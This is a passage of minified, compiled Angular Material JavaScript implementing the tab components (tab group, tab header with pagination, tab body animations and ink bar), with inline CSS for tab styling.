e=a.$implicit,i=a.index,n=Ti(4),r=B();Ct("mat-tab-label-active",r.selectedIndex===i),V("id",r._getTabLabelId(i))("ngClass",e.labelClass)("disabled",e.disabled)("matRippleDisabled",e.disabled||r.disableRipple),Rt("tabIndex",r._getTabIndex(e,i))("aria-posinset",i+1)("aria-setsize",r._tabs.length)("aria-controls",r._getTabContentId(i))("aria-selected",r.selectedIndex===i)("aria-label",e.ariaLabel||null)("aria-labelledby",!e.ariaLabel&&e.ariaLabelledby?e.ariaLabelledby:null),C(2),V("ngIf",e.templateLabel)("ngIfElse",n)}}function d0e(t,a){if(1&t){const e=Ye();m(0,"mat-tab-body",11),he("_onCentered",function(){return be(e),Me(B()._removeTabBodyWrapperHeight())})("_onCentering",function(n){return be(e),Me(B()._setTabBodyWrapperHeight(n))}),u()}if(2&t){const e=a.$implicit,i=a.index,n=B();Ct("mat-tab-body-active",n.selectedIndex===i),V("id",n._getTabContentId(i))("ngClass",e.bodyClass)("content",e.content)("position",e.position)("origin",e.origin)("animationDuration",n.animationDuration)("preserveContent",n.preserveContent),Rt("tabindex",null!=n.contentTabIndex&&n.selectedIndex===i?n.contentTabIndex:null)("aria-labelledby",n._getTabLabelId(i))}}const m0e=new ni("MatInkBarPositioner",{providedIn:"root",factory:function u0e(){return a=>({left:a?(a.offsetLeft||0)+"px":"0",width:a?(a.offsetWidth||0)+"px":"0"})}});let MF=(()=>{class t{constructor(e,i,n,r){this._elementRef=e,this._ngZone=i,this._inkBarPositioner=n,this._animationMode=r}alignToElement(e){this.show(),this._ngZone.run(()=>{this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{const i=this._inkBarPositioner(e),n=this._elementRef.nativeElement;n.style.left=i.left,n.style.width=i.width})})}show(){this._elementRef.nativeElement.style.visibility="visible"}hide(){this._elementRef.nativeElement.style.visibility="hidden"}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(m0e),Ee(ar,8))},t.\u0275dir=Ot({type:t,selectors:[["mat-ink-bar"]],hostAttrs:[1,"mat-ink-bar"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode)}}),t})();const vF=new ni("MatTabContent");let Uh=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","matTabContent",""]],features:[ki([{provide:vF,useExisting:t}])]}),t})();const AF=new ni("MatTabLabel"),TF=new ni("MAT_TAB");let V1=(()=>{class t extends N_e{constructor(e,i,n){super(e,i),this._closestTab=n}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(fo),Ee(TF,8))},t.\u0275dir=Ot({type:t,selectors:[["","mat-tab-label",""],["","matTabLabel",""]],features:[ki([{provide:AF,useExisting:t}]),ci]}),t})();const h0e=Zc(class{}),EF=new ni("MAT_TAB_GROUP");let Mu=(()=>{class t extends h0e{constructor(e,i){super(),this._viewContainerRef=e,this._closestTabGroup=i,this.textLabel="",this._contentPortal=null,this._stateChanges=new J,this.position=null,this.origin=null,this.isActive=!1}get templateLabel(){return this._templateLabel}set templateLabel(e){this._setTemplateLabelInput(e)}get content(){return this._contentPortal}ngOnChanges(e){(e.hasOwnProperty("textLabel")||e.hasOwnProperty("disabled"))&&this._stateChanges.next()}ngOnDestroy(){this._stateChanges.complete()}ngOnInit(){this._contentPortal=new Mm(this._explicitContent||this._implicitContent,this._viewContainerRef)}_setTemplateLabelInput(e){e&&e._closestTab===this&&(this._templateLabel=e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(EF,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tab"]],contentQueries:function(e,i,n){if(1&e&&(fa(n,AF,5),fa(n,vF,7,ho)),2&e){let r;Vt(r=Bt())&&(i.templateLabel=r.first),Vt(r=Bt())&&(i._explicitContent=r.first)}},viewQuery:function(e,i){if(1&e&&Mi(ho,7),2&e){let n;Vt(n=Bt())&&(i._implicitContent=n.first)}},inputs:{disabled:"disabled",textLabel:["label","textLabel"],ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],labelClass:"labelClass",bodyClass:"bodyClass"},exportAs:["matTab"],features:[ki([{provide:TF,useExisting:t}]),ci,sa],ngContentSelectors:bF,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),ne(0,Kge,1,0,"ng-template"))},encapsulation:2}),t})();const f0e={translateTab:nr("translateTab",[sn("center, void, left-origin-center, right-origin-center",zi({transform:"none"})),sn("left",zi({transform:"translate3d(-100%, 0, 0)",minHeight:"1px",visibility:"hidden"})),sn("right",zi({transform:"translate3d(100%, 0, 0)",minHeight:"1px",visibility:"hidden"})),gn("* => left, * => right, left => center, right => center",En("{{animationDuration}} cubic-bezier(0.35, 0, 0.25, 1)")),gn("void => left-origin-center",[zi({transform:"translate3d(-100%, 0, 0)",visibility:"hidden"}),En("{{animationDuration}} cubic-bezier(0.35, 0, 0.25, 1)")]),gn("void => right-origin-center",[zi({transform:"translate3d(100%, 0, 0)",visibility:"hidden"}),En("{{animationDuration}} cubic-bezier(0.35, 0, 0.25, 1)")])])};let p0e=(()=>{class t extends Cu{constructor(e,i,n,r){super(e,i,r),this._host=n,this._centeringSub=I.EMPTY,this._leavingSub=I.EMPTY}ngOnInit(){super.ngOnInit(),this._centeringSub=this._host._beforeCentering.pipe(Ro(this._host._isCenterPosition(this._host._position))).subscribe(e=>{e&&!this.hasAttached()&&this.attach(this._host._content)}),this._leavingSub=this._host._afterLeavingCenter.subscribe(()=>{this._host.preserveContent||this.detach()})}ngOnDestroy(){super.ngOnDestroy(),this._centeringSub.unsubscribe(),this._leavingSub.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(On),Ee(fo),Ee(ja(()=>DF)),Ee(ga))},t.\u0275dir=Ot({type:t,selectors:[["","matTabBodyHost",""]],features:[ci]}),t})(),_0e=(()=>{class t{constructor(e,i,n){this._elementRef=e,this._dir=i,this._dirChangeSubscription=I.EMPTY,this._translateTabComplete=new J,this._onCentering=new Tt,this._beforeCentering=new Tt,this._afterLeavingCenter=new Tt,this._onCentered=new Tt(!0),this.animationDuration="500ms",this.preserveContent=!1,i&&(this._dirChangeSubscription=i.change.subscribe(r=>{this._computePositionAnimationState(r),n.markForCheck()})),this._translateTabComplete.pipe(Bh((r,c)=>r.fromState===c.fromState&&r.toState===c.toState)).subscribe(r=>{this._isCenterPosition(r.toState)&&this._isCenterPosition(this._position)&&this._onCentered.emit(),this._isCenterPosition(r.fromState)&&!this._isCenterPosition(this._position)&&this._afterLeavingCenter.emit()})}set position(e){this._positionIndex=e,this._computePositionAnimationState()}ngOnInit(){"center"==this._position&&null!=this.origin&&(this._position=this._computePositionFromOrigin(this.origin))}ngOnDestroy(){this._dirChangeSubscription.unsubscribe(),this._translateTabComplete.complete()}_onTranslateTabStarted(e){const i=this._isCenterPosition(e.toState);this._beforeCentering.emit(i),i&&this._onCentering.emit(this._elementRef.nativeElement.clientHeight)}_getLayoutDirection(){return this._dir&&"rtl"===this._dir.value?"rtl":"ltr"}_isCenterPosition(e){return"center"==e||"left-origin-center"==e||"right-origin-center"==e}_computePositionAnimationState(e=this._getLayoutDirection()){this._position=this._positionIndex<0?"ltr"==e?"left":"right":this._positionIndex>0?"ltr"==e?"right":"left":"center"}_computePositionFromOrigin(e){const i=this._getLayoutDirection();return"ltr"==i&&e<=0||"rtl"==i&&e>0?"left-origin-center":"right-origin-center"}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Cr,8),Ee(Ma))},t.\u0275dir=Ot({type:t,inputs:{_content:["content","_content"],origin:"origin",animationDuration:"animationDuration",preserveContent:"preserveContent",position:"position"},outputs:{_onCentering:"_onCentering",_beforeCentering:"_beforeCentering",_afterLeavingCenter:"_afterLeavingCenter",_onCentered:"_onCentered"}}),t})(),DF=(()=>{class t extends _0e{constructor(e,i,n){super(e,i,n)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Cr,8),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tab-body"]],viewQuery:function(e,i){if(1&e&&Mi(Cu,5),2&e){let n;Vt(n=Bt())&&(i._portalHost=n.first)}},hostAttrs:[1,"mat-tab-body"],features:[ci],decls:3,vars:6,consts:[["cdkScrollable","",1,"mat-tab-body-content"],["content",""],["matTabBodyHost",""]],template:function(e,i){1&e&&(m(0,"div",0,1),he("@translateTab.start",function(r){return i._onTranslateTabStarted(r)})("@translateTab.done",function(r){return i._translateTabComplete.next(r)}),ne(2,Xge,0,0,"ng-template",2),u()),2&e&&V("@translateTab",Ah(3,Jge,i._position,fr(1,Yge,i.animationDuration)))},dependencies:[p0e],styles:['.mat-tab-body-content{height:100%;overflow:auto}.mat-tab-group-dynamic-height .mat-tab-body-content{overflow:hidden}.mat-tab-body-content[style*="visibility: hidden"]{display:none}'],encapsulation:2,data:{animation:[f0e.translateTab]}}),t})();const xF=new ni("MAT_TABS_CONFIG"),g0e=Zc(class{});let wF=(()=>{class t extends g0e{constructor(e){super(),this.elementRef=e}focus(){this.elementRef.nativeElement.focus()}getOffsetLeft(){return this.elementRef.nativeElement.offsetLeft}getOffsetWidth(){return this.elementRef.nativeElement.offsetWidth}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","matTabLabelWrapper",""]],hostVars:3,hostBindings:function(e,i){2&e&&(Rt("aria-disabled",!!i.disabled),Ct("mat-tab-disabled",i.disabled))},inputs:{disabled:"disabled"},features:[ci]}),t})();const IF=ym({passive:!0});let b0e=(()=>{class t{constructor(e,i,n,r,c,d,T){this._elementRef=e,this._changeDetectorRef=i,this._viewportRuler=n,this._dir=r,this._ngZone=c,this._platform=d,this._animationMode=T,this._scrollDistance=0,this._selectedIndexChanged=!1,this._destroyed=new J,this._showPaginationControls=!1,this._disableScrollAfter=!0,this._disableScrollBefore=!0,this._stopScrolling=new J,this._disablePagination=!1,this._selectedIndex=0,this.selectFocusedIndex=new Tt,this.indexFocused=new Tt,c.runOutsideAngular(()=>{Tc(e.nativeElement,"mouseleave").pipe(ea(this._destroyed)).subscribe(()=>{this._stopInterval()})})}get disablePagination(){return this._disablePagination}set disablePagination(e){this._disablePagination=wi(e)}get selectedIndex(){return this._selectedIndex}set selectedIndex(e){e=Uo(e),this._selectedIndex!=e&&(this._selectedIndexChanged=!0,this._selectedIndex=e,this._keyManager&&this._keyManager.updateActiveItem(e))}ngAfterViewInit(){Tc(this._previousPaginator.nativeElement,"touchstart",IF).pipe(ea(this._destroyed)).subscribe(()=>{this._handlePaginatorPress("before")}),Tc(this._nextPaginator.nativeElement,"touchstart",IF).pipe(ea(this._destroyed)).subscribe(()=>{this._handlePaginatorPress("after")})}ngAfterContentInit(){const e=this._dir?this._dir.change:Bi("ltr"),i=this._viewportRuler.change(150),n=()=>{this.updatePagination(),this._alignInkBarToSelectedTab()};this._keyManager=new L1(this._items).withHorizontalOrientation(this._getLayoutDirection()).withHomeAndEnd().withWrap(),this._keyManager.updateActiveItem(this._selectedIndex),this._ngZone.onStable.pipe(Cn(1)).subscribe(n),ra(e,i,this._items.changes,this._itemsResized()).pipe(ea(this._destroyed)).subscribe(()=>{this._ngZone.run(()=>{Promise.resolve().then(()=>{this._scrollDistance=Math.max(0,Math.min(this._getMaxScrollDistance(),this._scrollDistance)),n()})}),this._keyManager.withHorizontalOrientation(this._getLayoutDirection())}),this._keyManager.change.pipe(ea(this._destroyed)).subscribe(r=>{this.indexFocused.emit(r),this._setTabFocus(r)})}_itemsResized(){return"function"!=typeof ResizeObserver?ha:this._items.changes.pipe(Ro(this._items),Ur(e=>new G(i=>this._ngZone.runOutsideAngular(()=>{const n=new ResizeObserver(()=>{i.next()});return e.forEach(r=>{n.observe(r.elementRef.nativeElement)}),()=>{n.disconnect()}}))),Sw(1))}ngAfterContentChecked(){this._tabLabelCount!=this._items.length&&(this.updatePagination(),this._tabLabelCount=this._items.length,this._changeDetectorRef.markForCheck()),this._selectedIndexChanged&&(this._scrollToLabel(this._selectedIndex),this._checkScrollingControls(),this._alignInkBarToSelectedTab(),this._selectedIndexChanged=!1,this._changeDetectorRef.markForCheck()),this._scrollDistanceChanged&&(this._updateTabScrollPosition(),this._scrollDistanceChanged=!1,this._changeDetectorRef.markForCheck())}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete(),this._stopScrolling.complete()}_handleKeydown(e){if(!es(e))switch(e.keyCode){case 13:case 32:this.focusIndex!==this.selectedIndex&&(this.selectFocusedIndex.emit(this.focusIndex),this._itemSelected(e));break;default:this._keyManager.onKeydown(e)}}_onContentChanges(){const e=this._elementRef.nativeElement.textContent;e!==this._currentTextContent&&(this._currentTextContent=e||"",this._ngZone.run(()=>{this.updatePagination(),this._alignInkBarToSelectedTab(),this._changeDetectorRef.markForCheck()}))}updatePagination(){this._checkPaginationEnabled(),this._checkScrollingControls(),this._updateTabScrollPosition()}get focusIndex(){return this._keyManager?this._keyManager.activeItemIndex:0}set focusIndex(e){!this._isValidIndex(e)||this.focusIndex===e||!this._keyManager||this._keyManager.setActiveItem(e)}_isValidIndex(e){if(!this._items)return!0;const i=this._items?this._items.toArray()[e]:null;return!!i&&!i.disabled}_setTabFocus(e){if(this._showPaginationControls&&this._scrollToLabel(e),this._items&&this._items.length){this._items.toArray()[e].focus();const i=this._tabListContainer.nativeElement;i.scrollLeft="ltr"==this._getLayoutDirection()?0:i.scrollWidth-i.offsetWidth}}_getLayoutDirection(){return this._dir&&"rtl"===this._dir.value?"rtl":"ltr"}_updateTabScrollPosition(){if(this.disablePagination)return;const e=this.scrollDistance,i="ltr"===this._getLayoutDirection()?-e:e;this._tabList.nativeElement.style.transform=`translateX(${Math.round(i)}px)`,(this._platform.TRIDENT||this._platform.EDGE)&&(this._tabListContainer.nativeElement.scrollLeft=0)}get scrollDistance(){return this._scrollDistance}set scrollDistance(e){this._scrollTo(e)}_scrollHeader(e){return this._scrollTo(this._scrollDistance+("before"==e?-1:1)*this._tabListContainer.nativeElement.offsetWidth/3)}_handlePaginatorClick(e){this._stopInterval(),this._scrollHeader(e)}_scrollToLabel(e){if(this.disablePagination)return;const i=this._items?this._items.toArray()[e]:null;if(!i)return;const n=this._tabListContainer.nativeElement.offsetWidth,{offsetLeft:r,offsetWidth:c}=i.elementRef.nativeElement;let d,T;"ltr"==this._getLayoutDirection()?(d=r,T=d+c):(T=this._tabListInner.nativeElement.offsetWidth-r,d=T-c);const k=this.scrollDistance,q=this.scrollDistance+n;d<k?this.scrollDistance-=k-d+60:T>q&&(this.scrollDistance+=T-q+60)}_checkPaginationEnabled(){if(this.disablePagination)this._showPaginationControls=!1;else{const e=this._tabListInner.nativeElement.scrollWidth>this._elementRef.nativeElement.offsetWidth;e||(this.scrollDistance=0),e!==this._showPaginationControls&&this._changeDetectorRef.markForCheck(),this._showPaginationControls=e}}_checkScrollingControls(){this.disablePagination?this._disableScrollAfter=this._disableScrollBefore=!0:(this._disableScrollBefore=0==this.scrollDistance,this._disableScrollAfter=this.scrollDistance==this._getMaxScrollDistance(),this._changeDetectorRef.markForCheck())}_getMaxScrollDistance(){return this._tabListInner.nativeElement.scrollWidth-this._tabListContainer.nativeElement.offsetWidth||0}_alignInkBarToSelectedTab(){const e=this._items&&this._items.length?this._items.toArray()[this.selectedIndex]:null,i=e?e.elementRef.nativeElement:null;i?this._inkBar.alignToElement(i):this._inkBar.hide()}_stopInterval(){this._stopScrolling.next()}_handlePaginatorPress(e,i){i&&null!=i.button&&0!==i.button||(this._stopInterval(),M3(650,100).pipe(ea(ra(this._stopScrolling,this._destroyed))).subscribe(()=>{const{maxScrollDistance:n,distance:r}=this._scrollHeader(e);(0===r||r>=n)&&this._stopInterval()}))}_scrollTo(e){if(this.disablePagination)return{maxScrollDistance:0,distance:0};const i=this._getMaxScrollDistance();return this._scrollDistance=Math.max(0,Math.min(i,e)),this._scrollDistanceChanged=!0,this._checkScrollingControls(),{maxScrollDistance:i,distance:this._scrollDistance}}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(bm),Ee(Cr,8),Ee(qi),Ee(cr),Ee(ar,8))},t.\u0275dir=Ot({type:t,inputs:{disablePagination:"disablePagination"}}),t})(),M0e=(()=>{class t extends b0e{constructor(e,i,n,r,c,d,T){super(e,i,n,r,c,d,T),this._disableRipple=!1}get disableRipple(){return this._disableRipple}set disableRipple(e){this._disableRipple=wi(e)}_itemSelected(e){e.preventDefault()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(bm),Ee(Cr,8),Ee(qi),Ee(cr),Ee(ar,8))},t.\u0275dir=Ot({type:t,inputs:{disableRipple:"disableRipple"},features:[ci]}),t})(),v0e=(()=>{class t extends M0e{constructor(e,i,n,r,c,d,T){super(e,i,n,r,c,d,T)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(bm),Ee(Cr,8),Ee(qi),Ee(cr),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tab-header"]],contentQueries:function(e,i,n){if(1&e&&fa(n,wF,4),2&e){let r;Vt(r=Bt())&&(i._items=r)}},viewQuery:function(e,i){if(1&e&&(Mi(MF,7),Mi(Zge,7),Mi(e0e,7),Mi(t0e,7),Mi(i0e,5),Mi(a0e,5)),2&e){let n;Vt(n=Bt())&&(i._inkBar=n.first),Vt(n=Bt())&&(i._tabListContainer=n.first),Vt(n=Bt())&&(i._tabList=n.first),Vt(n=Bt())&&(i._tabListInner=n.first),Vt(n=Bt())&&(i._nextPaginator=n.first),Vt(n=Bt())&&(i._previousPaginator=n.first)}},hostAttrs:[1,"mat-tab-header"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("mat-tab-header-pagination-controls-enabled",i._showPaginationControls)("mat-tab-header-rtl","rtl"==i._getLayoutDirection())},inputs:{selectedIndex:"selectedIndex"},outputs:{selectFocusedIndex:"selectFocusedIndex",indexFocused:"indexFocused"},features:[ci],ngContentSelectors:bF,decls:14,vars:10,consts:[["aria-hidden","true","type","button","mat-ripple","","tabindex","-1",1,"mat-tab-header-pagination","mat-tab-header-pagination-before","mat-elevation-z4",3,"matRippleDisabled","disabled","click","mousedown","touchend"],["previousPaginator",""],[1,"mat-tab-header-pagination-chevron"],[1,"mat-tab-label-container",3,"keydown"],["tabListContainer",""],["role","tablist",1,"mat-tab-list",3,"cdkObserveContent"],["tabList",""],[1,"mat-tab-labels"],["tabListInner",""],["aria-hidden","true","type","button","mat-ripple","","tabindex","-1",1,"mat-tab-header-pagination","mat-tab-header-pagination-after","mat-elevation-z4",3,"matRippleDisabled","disabled","mousedown","click","touchend"],["nextPaginator",""]],template:function(e,i){1&e&&(Jn(),m(0,"button",0,1),he("click",function(){return i._handlePaginatorClick("before")})("mousedown",function(r){return i._handlePaginatorPress("before",r)})("touchend",function(){return i._stopInterval()}),it(2,"div",2),u(),m(3,"div",3,4),he("keydown",function(r){return i._handleKeydown(r)}),m(5,"div",5,6),he("cdkObserveContent",function(){return i._onContentChanges()}),m(7,"div",7,8),va(9),u(),it(10,"mat-ink-bar"),u()(),m(11,"button",9,10),he("mousedown",function(r){return i._handlePaginatorPress("after",r)})("click",function(){return i._handlePaginatorClick("after")})("touchend",function(){return i._stopInterval()}),it(13,"div",2),u()),2&e&&(Ct("mat-tab-header-pagination-disabled",i._disableScrollBefore),V("matRippleDisabled",i._disableScrollBefore||i.disableRipple)("disabled",i._disableScrollBefore||null),C(5),Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode),C(6),Ct("mat-tab-header-pagination-disabled",i._disableScrollAfter),V("matRippleDisabled",i._disableScrollAfter||i.disableRipple)("disabled",i._disableScrollAfter||null))},dependencies:[Dl,P3,MF],styles:[".mat-tab-header{display:flex;overflow:hidden;position:relative;flex-shrink:0}.mat-tab-header-pagination{-webkit-user-select:none;user-select:none;position:relative;display:none;justify-content:center;align-items:center;min-width:32px;cursor:pointer;z-index:2;-webkit-tap-highlight-color:rgba(0,0,0,0);touch-action:none;box-sizing:content-box;background:none;border:none;outline:0;padding:0}.mat-tab-header-pagination::-moz-focus-inner{border:0}.mat-tab-header-pagination-controls-enabled .mat-tab-header-pagination{display:flex}.mat-tab-header-pagination-before,.mat-tab-header-rtl .mat-tab-header-pagination-after{padding-left:4px}.mat-tab-header-pagination-before .mat-tab-header-pagination-chevron,.mat-tab-header-rtl .mat-tab-header-pagination-after .mat-tab-header-pagination-chevron{transform:rotate(-135deg)}.mat-tab-header-rtl .mat-tab-header-pagination-before,.mat-tab-header-pagination-after{padding-right:4px}.mat-tab-header-rtl .mat-tab-header-pagination-before .mat-tab-header-pagination-chevron,.mat-tab-header-pagination-after .mat-tab-header-pagination-chevron{transform:rotate(45deg)}.mat-tab-header-pagination-chevron{border-style:solid;border-width:2px 2px 0 0;height:8px;width:8px}.mat-tab-header-pagination-disabled{box-shadow:none;cursor:default}.mat-tab-list{flex-grow:1;position:relative;transition:transform 500ms cubic-bezier(0.35, 0, 0.25, 1)}.mat-ink-bar{position:absolute;bottom:0;height:2px;transition:500ms cubic-bezier(0.35, 0, 0.25, 1)}.mat-ink-bar._mat-animation-noopable{transition:none !important;animation:none !important}.mat-tab-group-inverted-header .mat-ink-bar{bottom:auto;top:0}.cdk-high-contrast-active .mat-ink-bar{outline:solid 2px;height:0}.mat-tab-labels{display:flex}[mat-align-tabs=center]>.mat-tab-header .mat-tab-labels{justify-content:center}[mat-align-tabs=end]>.mat-tab-header .mat-tab-labels{justify-content:flex-end}.mat-tab-label-container{display:flex;flex-grow:1;overflow:hidden;z-index:1}.mat-tab-list._mat-animation-noopable{transition:none !important;animation:none !important}.mat-tab-label{height:48px;padding:0 24px;cursor:pointer;box-sizing:border-box;opacity:.6;min-width:160px;text-align:center;display:inline-flex;justify-content:center;align-items:center;white-space:nowrap;position:relative}.mat-tab-label:focus{outline:none}.mat-tab-label:focus:not(.mat-tab-disabled){opacity:1}.mat-tab-label.mat-tab-disabled{cursor:default}.cdk-high-contrast-active .mat-tab-label.mat-tab-disabled{opacity:.5}.mat-tab-label .mat-tab-label-content{display:inline-flex;justify-content:center;align-items:center;white-space:nowrap}.cdk-high-contrast-active .mat-tab-label{opacity:1}.mat-tab-label::before{margin:5px}@media(max-width: 599px){.mat-tab-label{min-width:72px}}"],encapsulation:2}),t})(),A0e=0;class T0e{}const E0e=Pd(El(class{constructor(t){this._elementRef=t}}),"primary");let D0e=(()=>{class t extends E0e{constructor(e,i,n,r){var c;super(e),this._changeDetectorRef=i,this._animationMode=r,this._tabs=new Cd,this._indexToSelect=0,this._lastFocusedTabIndex=null,this._tabBodyWrapperHeight=0,this._tabsSubscription=I.EMPTY,this._tabLabelSubscription=I.EMPTY,this._dynamicHeight=!1,this._selectedIndex=null,this.headerPosition="above",this._disablePagination=!1,this._preserveContent=!1,this.selectedIndexChange=new Tt,this.focusChange=new Tt,this.animationDone=new Tt,this.selectedTabChange=new Tt(!0),this._groupId=A0e++,this.animationDuration=n&&n.animationDuration?n.animationDuration:"500ms",this.disablePagination=!(!n||null==n.disablePagination)&&n.disablePagination,this.dynamicHeight=!(!n||null==n.dynamicHeight)&&n.dynamicHeight,this.contentTabIndex=null!==(c=null==n?void 0:n.contentTabIndex)&&void 0!==c?c:null,this.preserveContent=!(null==n||!n.preserveContent)}get dynamicHeight(){return this._dynamicHeight}set dynamicHeight(e){this._dynamicHeight=wi(e)}get selectedIndex(){return this._selectedIndex}set selectedIndex(e){this._indexToSelect=Uo(e,null)}get animationDuration(){return this._animationDuration}set animationDuration(e){this._animationDuration=/^\d+$/.test(e+"")?e+"ms":e}get contentTabIndex(){return this._contentTabIndex}set contentTabIndex(e){this._contentTabIndex=Uo(e,null)}get disablePagination(){return this._disablePagination}set disablePagination(e){this._disablePagination=wi(e)}get preserveContent(){return this._preserveContent}set preserveContent(e){this._preserveContent=wi(e)}get backgroundColor(){return this._backgroundColor}set backgroundColor(e){const i=this._elementRef.nativeElement;i.classList.remove(`mat-background-${this.backgroundColor}`),e&&i.classList.add(`mat-background-${e}`),this._backgroundColor=e}ngAfterContentChecked(){const e=this._indexToSelect=this._clampTabIndex(this._indexToSelect);if(this._selectedIndex!=e){const i=null==this._selectedIndex;if(!i){this.selectedTabChange.emit(this._createChangeEvent(e));const n=this._tabBodyWrapper.nativeElement;n.style.minHeight=n.clientHeight+"px"}Promise.resolve().then(()=>{this._tabs.forEach((n,r)=>n.isActive=r===e),i||(this.selectedIndexChange.emit(e),this._tabBodyWrapper.nativeElement.style.minHeight="")})}this._tabs.forEach((i,n)=>{i.position=n-e,null!=this._selectedIndex&&0==i.position&&!i.origin&&(i.origin=e-this._selectedIndex)}),this._selectedIndex!==e&&(this._selectedIndex=e,this._lastFocusedTabIndex=null,this._changeDetectorRef.markForCheck())}ngAfterContentInit(){this._subscribeToAllTabChanges(),this._subscribeToTabLabels(),this._tabsSubscription=this._tabs.changes.subscribe(()=>{const e=this._clampTabIndex(this._indexToSelect);if(e===this._selectedIndex){const i=this._tabs.toArray();let n;for(let r=0;r<i.length;r++)if(i[r].isActive){this._indexToSelect=this._selectedIndex=r,this._lastFocusedTabIndex=null,n=i[r];break}!n&&i[e]&&Promise.resolve().then(()=>{i[e].isActive=!0,this.selectedTabChange.emit(this._createChangeEvent(e))})}this._changeDetectorRef.markForCheck()})}_subscribeToAllTabChanges(){this._allTabs.changes.pipe(Ro(this._allTabs)).subscribe(e=>{this._tabs.reset(e.filter(i=>i._closestTabGroup===this||!i._closestTabGroup)),this._tabs.notifyOnChanges()})}ngOnDestroy(){this._tabs.destroy(),this._tabsSubscription.unsubscribe(),this._tabLabelSubscription.unsubscribe()}realignInkBar(){this._tabHeader&&this._tabHeader._alignInkBarToSelectedTab()}updatePagination(){this._tabHeader&&this._tabHeader.updatePagination()}focusTab(e){const i=this._tabHeader;i&&(i.focusIndex=e)}_focusChanged(e){this._lastFocusedTabIndex=e,this.focusChange.emit(this._createChangeEvent(e))}_createChangeEvent(e){const i=new T0e;return i.index=e,this._tabs&&this._tabs.length&&(i.tab=this._tabs.toArray()[e]),i}_subscribeToTabLabels(){this._tabLabelSubscription&&this._tabLabelSubscription.unsubscribe(),this._tabLabelSubscription=ra(...this._tabs.map(e=>e._stateChanges)).subscribe(()=>this._changeDetectorRef.markForCheck())}_clampTabIndex(e){return Math.min(this._tabs.length-1,Math.max(e||0,0))}_getTabLabelId(e){return`mat-tab-label-${this._groupId}-${e}`}_getTabContentId(e){return`mat-tab-content-${this._groupId}-${e}`}_setTabBodyWrapperHeight(e){if(!this._dynamicHeight||!this._tabBodyWrapperHeight)return;const i=this._tabBodyWrapper.nativeElement;i.style.height=this._tabBodyWrapperHeight+"px",this._tabBodyWrapper.nativeElement.offsetHeight&&(i.style.height=e+"px")}_removeTabBodyWrapperHeight(){const e=this._tabBodyWrapper.nativeElement;this._tabBodyWrapperHeight=e.clientHeight,e.style.height="",this.animationDone.emit()}_handleClick(e,i,n){e.disabled||(this.selectedIndex=i.focusIndex=n)}_getTabIndex(e,i){var n;return e.disabled?null:i===(null!==(n=this._lastFocusedTabIndex)&&void 0!==n?n:this.selectedIndex)?0:-1}_tabFocusChanged(e,i){e&&"mouse"!==e&&"touch"!==e&&(this._tabHeader.focusIndex=i)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(xF,8),Ee(ar,8))},t.\u0275dir=Ot({type:t,inputs:{dynamicHeight:"dynamicHeight",selectedIndex:"selectedIndex",headerPosition:"headerPosition",animationDuration:"animationDuration",contentTabIndex:"contentTabIndex",disablePagination:"disablePagination",preserveContent:"preserveContent",backgroundColor:"backgroundColor"},outputs:{selectedIndexChange:"selectedIndexChange",focusChange:"focusChange",animationDone:"animationDone",selectedTabChange:"selectedTabChange"},features:[ci]}),t})(),qh=(()=>{class t extends D0e{constructor(e,i,n,r){super(e,i,n,r)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(xF,8),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-tab-group"]],contentQueries:function(e,i,n){if(1&e&&fa(n,Mu,5),2&e){let r;Vt(r=Bt())&&(i._allTabs=r)}},viewQuery:function(e,i){if(1&e&&(Mi(n0e,5),Mi(o0e,5)),2&e){let n;Vt(n=Bt())&&(i._tabBodyWrapper=n.first),Vt(n=Bt())&&(i._tabHeader=n.first)}},hostAttrs:[1,"mat-tab-group"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("mat-tab-group-dynamic-height",i.dynamicHeight)("mat-tab-group-inverted-header","below"===i.headerPosition)},inputs:{color:"color",disableRipple:"disableRipple"},exportAs:["matTabGroup"],features:[ki([{provide:EF,useExisting:t}]),ci],decls:6,vars:7,consts:[[3,"selectedIndex","disableRipple","disablePagination","indexFocused","selectFocusedIndex"],["tabHeader",""],["class","mat-tab-label 